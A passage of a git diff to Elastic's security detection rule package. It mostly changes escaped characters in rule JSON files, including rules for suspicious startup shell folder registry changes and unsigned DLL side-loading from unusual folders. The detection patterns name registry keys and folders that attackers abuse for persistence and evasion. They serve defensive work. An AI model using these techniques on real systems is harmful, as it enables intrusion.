concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\"\n ) and\n registry.data.strings != null and\n /* Normal Startup Folder Paths */\n not registry.data.strings : (\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%ProgramData%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%USERPROFILE%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\"\n )\n",
 "related_integrations": [
 {
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_108.json b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_108.json
index eb594904a6f..be46fd084cf 100644
--- a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_108.json
@@ -12,7 +12,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Suspicious Startup Shell Folder Modification",
- "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\"\n ) and\n registry.data.strings != null and\n /* Normal Startup Folder Paths */\n not registry.data.strings : (\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%ProgramData%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%USERPROFILE%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\"\n )\n", "related_integrations": [ { 
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -74,7 +74,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_104.json b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_104.json
index 0508e938bca..03210eebc2d 100644
--- a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_104.json
@@ -61,7 +61,7 @@
 ],
 "risk_score": 47,
 "rule_id": "c8cccb06-faf2-4cd5-886e-2c9636cfcb87",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_105.json b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_105.json
index 28ed06fc171..029b68eb9da 100644
--- a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_105.json
@@ -61,7 +61,7 @@
 ],
 "risk_score": 47,
 "rule_id": "c8cccb06-faf2-4cd5-886e-2c9636cfcb87",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_106.json b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_106.json
index 89841230f60..7ffcdc9d578 100644
--- a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_106.json
@@ -61,7 +61,7 @@
 ],
 "risk_score": 47,
 "rule_id": "c8cccb06-faf2-4cd5-886e-2c9636cfcb87",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_107.json b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_107.json
index f83fddd080f..0b865d8f3ce 100644
--- a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_107.json
@@ -61,7 +61,7 @@
 ],
 "risk_score": 47,
 "rule_id": "c8cccb06-faf2-4cd5-886e-2c9636cfcb87",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -97,7 +97,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_108.json b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_108.json
index ce61fc2c231..145632c6412 100644
--- a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_108.json
@@ -61,7 +61,7 @@
 ],
 "risk_score": 47,
 "rule_id": "c8cccb06-faf2-4cd5-886e-2c9636cfcb87",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -97,7 +97,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_1.json b/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_1.json
index edc281842a3..a950e2c7564 100644
--- a/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_1.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_2.json b/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_2.json
index 9a2a8e533ec..961eea0caeb 100644
--- a/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_2.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_3.json b/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_3.json
index e5288b4f8f8..0a0a25eef6a 100644
--- a/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_3.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_4.json b/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_4.json
index f1d32cff6b1..c225001e019 100644
--- a/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_4.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -84,7 +84,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/c9e38e64-3f4c-4bf3-ad48-0e61a60ea1fa_100.json b/packages/security_detection_engine/kibana/security_rule/c9e38e64-3f4c-4bf3-ad48-0e61a60ea1fa_100.json
index 82d989ccfd8..6954cdb1e4d 100644
--- a/packages/security_detection_engine/kibana/security_rule/c9e38e64-3f4c-4bf3-ad48-0e61a60ea1fa_100.json
+++ b/packages/security_detection_engine/kibana/security_rule/c9e38e64-3f4c-4bf3-ad48-0e61a60ea1fa_100.json
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/c9e38e64-3f4c-4bf3-ad48-0e61a60ea1fa_101.json b/packages/security_detection_engine/kibana/security_rule/c9e38e64-3f4c-4bf3-ad48-0e61a60ea1fa_101.json
index 3c833ec39af..789fe45e3a7 100644
--- a/packages/security_detection_engine/kibana/security_rule/c9e38e64-3f4c-4bf3-ad48-0e61a60ea1fa_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/c9e38e64-3f4c-4bf3-ad48-0e61a60ea1fa_101.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_101.json b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_101.json
index 33aaf8a9c06..5a03b124ee0 100644
--- a/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_101.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_102.json b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_102.json
index 5b9f0a9ea42..1827476c498 100644
--- a/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_102.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_2.json b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_2.json
index 9bcb9d251c7..0d9d7a7e9e4 100644
--- a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_2.json
@@ -12,7 +12,7 @@ "license": "Elastic License v2", "name": "Unsigned DLL Side-Loading from a Suspicious Folder", "note": "", - "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time \u003c= 500 or dll.Ext.relative_file_name_modify_time \u003c= 500) and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n \"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n \"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n \"?:\\\\Windows\\\\panther\\\\*.dll\",\n 